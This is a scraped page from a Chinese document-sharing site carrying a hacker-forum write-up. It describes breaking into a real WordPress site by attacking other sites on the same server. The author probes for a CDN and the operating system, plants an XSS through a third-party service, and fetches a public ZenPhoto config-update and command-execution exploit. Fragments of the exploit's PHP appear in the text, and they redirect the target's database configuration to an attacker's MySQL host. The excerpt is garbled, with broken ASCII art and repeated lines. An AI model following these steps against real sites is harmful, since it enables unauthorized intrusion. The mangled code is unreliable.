欢迎来到天天文库
浏览记录
ID:9880991
大小:2.02 MB
页数:22页
时间:2018-05-13
《[法客周年庆]无尽的提权》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、《边干边写---重要的是思路》由于一直在忙工作,很久很久没写东西了,但是为了法克周年庆。(庆祝杨凡被爆菊花三周年纪念日)还是写一篇吧。很多好的文章由于一些原因不能写出来。大家将就下。而且本人有拖延症。我敢说,我弄下之后就会懒得写文章。所以边日边写吧;D收集了下目标信息。神器WhatWeb看到的Wordpress的而且版本略高。切由于工作性质特殊。估计直接从插件下手的机会不大。果断决定从旁注入手先分析一下目标的操作系统和是否有CDN。先分享下我探测目标是否有Cdn的方法。http://www.webkaka.com/webCheck.aspx
2、在这个地方给网站测速。可以显示各地的机房ping目标的ip。(打码真累)了解cdn的同学一看就知道了。99%是没有的。估计是国外的虚拟主机。或者服务器。这样的话。至少知道在同一台机器上了。可以开始看看旁注。运气好的话是可以把目标干下来的。探测目标操作系统的方法也很简单。大小写。大家都懂的在旁注一站点上看到了这样一个页面。然后决定先打个xss进去看看这里用的端是xss.la的wooyun有号的朋友可以在wooyun集市里购花50WB购买邀请码这里只是写个思路。不一定会成功。看到这里,能看出来是一个老外给自己的儿子搞的网站(老外真欢乐)。继续看
3、能不能找到这套系统的资料然后进一步下手。在域名后面加个/admin跳转到了这个地方。从这里可以看到。这套系统叫做ZenPhoto。把admin.php换成admin.phP后发现文件不存在。从这里可以知道。目标系统非windows奉献给搞国外站的基友们一个和exploit-db类似的网站"http://www.exploitsdownload.com"查询下看看有没有神马漏洞。这种时候要是能找到目标用的程序的版本。会更加的方便查询后看到这样一个exp
4、/
5、/__/
6、
7、
8、
9、_
10、/
11、
12、
13、
14、/
15、
16、
17、
18、
19、
20、_)
21、
22、
23、/
24、
25、
26、
27、
28、//\
29、
30、
31、
32、_<
33、
34、
35、
36、
37、__
38、/____
39、__
40、
41、
42、_)
43、
44、_
45、
46、_
47、____/_/_____/
48、____/http://www.exploit-db.com/moaub-26-zenphoto-config-update-and-command-execute-vulnerability/AbysssecIncPublicAdvisoryTitle:ZenphotoConfigUpdateandCommandExecuteVulnerabilityAffectedVersion:Zenpho
49、to<=1.3Discovery:www.abysssec.comVendor:http://www.zenphoto.org*/$path="http://www.site.com/zenphoto"."/"."zp-core/setup.php";$new_mysql_user="abysssec";$new_mysql_pass="absssec";$new_mysql_host="abysssec.com";$new_mysql_database="abysssec_database";$new_mysql_prefix="zp_"
50、;echo"
51、mysql_user'value='$new_mysql_user'>52、efix'>Afterclickonbelow,iftargetwillcanconnecttoyourMysql_Host:YouMustview'GO!'Messeg
52、efix'>Afterclickonbelow,iftargetwillcanconnecttoyourMysql_Host:YouMustview'GO!'Messeg
此文档下载收益归作者所有